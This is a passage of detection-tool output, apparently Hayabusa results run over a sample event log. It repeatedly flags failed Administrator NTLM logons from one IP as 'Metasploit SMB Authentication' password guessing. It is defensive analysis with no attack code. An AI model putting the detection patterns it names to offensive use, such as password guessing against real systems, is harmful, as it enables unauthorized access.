Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 